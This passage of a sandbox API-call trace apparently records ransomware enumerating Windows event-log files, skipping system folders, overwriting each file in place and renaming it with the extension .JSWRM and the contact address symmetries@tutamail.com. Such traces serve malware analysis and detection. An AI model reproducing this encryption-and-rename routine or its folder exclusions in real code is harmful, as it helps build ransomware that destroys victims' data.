ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cAlternateFileName="MIAEBD~1.EVT")) returned 1 [0065.473] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2=".") returned 1 [0065.473] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="..") returned 1 [0065.473] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="...") returned 1 [0065.473] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="windows") returned -1 [0065.473] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="recovery") returned -1 [0065.473] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="perflogs") returned -1 [0065.473] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="documents and settings") returned 1 [0065.473] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.473] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="system volume information") returned -1 [0065.473] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="msocache") returned -1 [0065.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0065.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0065.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0065.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cchWideChar=78, lpMultiByteStr=0x22c7a0, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpUsedDefaultChar=0x0) returned 78 [0065.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0065.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0065.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0065.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0065.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cchWideChar=78, lpMultiByteStr=0x22c488, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpUsedDefaultChar=0x0) returned 78 [0065.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0065.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0065.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0065.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0065.473] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.474] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=1052672) returned 1 [0065.474] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2481b0 [0065.474] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0065.488] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.488] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0065.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.489] CloseHandle (hObject=0x450) returned 1 [0065.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0065.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0065.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0065.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0065.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0065.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.547] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0065.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0065.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0065.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0065.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0065.547] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cef47f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cef47f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cAlternateFileName="MIA726~1.EVT")) returned 1 [0065.548] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2=".") returned 1 [0065.548] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="..") returned 1 [0065.548] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="...") returned 1 [0065.548] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="windows") returned -1 [0065.548] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="recovery") returned -1 [0065.548] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="perflogs") returned -1 [0065.548] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="documents and settings") returned 1 [0065.548] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.548] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="system volume information") returned -1 [0065.548] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpString2="msocache") returned -1 [0065.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0065.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0065.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cchWideChar=48, lpMultiByteStr=0x20de78, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpUsedDefaultChar=0x0) returned 48 [0065.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0065.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0065.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0065.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", cchWideChar=48, lpMultiByteStr=0x20e268, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-DeviceSetupManager%4Admin.evtx", lpUsedDefaultChar=0x0) returned 48 [0065.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0065.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0065.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0065.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0065.548] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.548] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.549] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.549] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.554] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.554] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.555] CloseHandle (hObject=0x450) returned 1 [0065.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0065.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0065.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0065.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0065.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0065.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ef08 [0065.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.557] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0065.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0065.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0065.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.558] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cAlternateFileName="MI08CB~1.EVT")) returned 1 [0065.558] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2=".") returned 1 [0065.558] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="..") returned 1 [0065.558] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="...") returned 1 [0065.558] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="windows") returned -1 [0065.558] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="recovery") returned -1 [0065.558] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="perflogs") returned -1 [0065.558] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.558] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.558] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="system volume information") returned -1 [0065.558] lstrcmpiW (lpString1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpString2="msocache") returned -1 [0065.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0065.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0065.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cchWideChar=54, lpMultiByteStr=0x20e268, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpUsedDefaultChar=0x0) returned 54 [0065.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0065.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0065.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0065.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cchWideChar=54, lpMultiByteStr=0x20e418, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", lpUsedDefaultChar=0x0) returned 54 [0065.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0065.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0065.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0065.559] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.559] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.559] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.559] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.564] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.564] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.565] CloseHandle (hObject=0x450) returned 1 [0065.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0065.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0065.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0065.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0065.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 